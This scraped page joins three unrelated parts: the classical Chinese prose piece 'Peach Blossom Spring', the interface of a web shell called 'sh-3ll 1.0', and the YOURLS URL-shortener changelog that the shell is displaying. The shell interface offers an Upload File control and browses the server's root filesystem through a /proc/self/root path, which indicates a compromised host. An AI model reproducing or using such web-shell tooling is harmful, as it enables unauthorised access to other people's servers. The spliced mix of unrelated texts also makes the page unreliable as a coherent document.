晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 sh-3ll

HOME


sh-3ll 1.0
DIR:/proc/thread-self/root/proc/self/root/var/softaculous/yourls/
Upload File :
Current File : //proc/thread-self/root/proc/self/root/var/softaculous/yourls/changelog.txt
1.10.3

    added: testing on PHP 8.5 & 8.6 (#4036)
    added: function to get reserved URLs from global variable (#3999)
    added: database index on long URLs, for faster searches (#4013)
    added: $context parameter of yourls_get_db() (#4020)
    changed: hide referrers on public statistics page by default (#4005)
    changed: set the infos cache of the keyword after a url is added/updated/deleted (#4008)
    changed: fix hover-actions in tables for screen reader users (#4025)
    changed: confirm link deletion with a modal dialog (#3932)
    fixed: upgrade spatie/array-to-xml to address deprecation warnings in newer PHP version (#4037)
    fixed: filtering for links with more than 0 clicks (#3977)
    fixed: case-sensitivity in admin search (#3997)
    fixed: missing or invalid reserved URL configuration causing crash (#3999)
    fixed: handling of invalid charsets on remote sites (#4007)
    fixed: preserve backslashes in URLs (#4000)
    fixed: validate JSONP callback names (#4030)
    fixed: enhance configuration template formatting (#3994)
    fixed: minor cleanup (#3979, #3984, #3988)
	
1.10.2

	fixed: admin/tools.php now uses yourls_get_nonce_life() (#3906)
	fixed: "Display 1 to 0 of 0 URLs" on admin list page (#3910)
	fixed: replace deprecated get_all_options filter with an action (#3683)
	fixed: defer loading text domain after plugins (#3679)
	removed: Gandi references (#3929)

1.10.1

    fixed: sandbox exceptions when disabling plugins by @LeoColomb in #3893
    fixed: stats date calculation are now correct by @ntindicator in #3895
    fixed: unexpected warning raised on login page
    removed: unsupported installation cases with Composer

1.10.0
	
	added: Support PHP 8.3 & 8.4
	removed: Support for PHP prior to 8.1 which is now minimal requirement
	changed: Ensure all statusCode/errorCode API values are strings (#3756)
	fixed: Results with 0 clicks on search (#3589)
	fixed: Upgrade Aura.SQL to fix PHP 8.4 compatibility (#3852)
	fixed: login page accessibility (#3660)
	fixed: MySQL 8+ compatibility (#3828)
	changed: Upgrade dependencies
	changed: Update GeoIP DB
	changed: Update certificate

1.9.2

	added: Support PHP 8.2 (#3474)
	improved: Googlebot indexing now filterable for plugins, for your SEO needs (#3517)
	improved: Use safe sandbox for all included files (#3478)
	fixed: bookmarklets with URL containing special chars (#3527)
	fixed: unwanted cookies could interfere with YOURLS (#3516)
	fixed: cosmetic bugs in the admin interface (#3485, #3431, #3518)
	fixed: support usernames containing brackets (#3365)
	updated: third party libs and binaries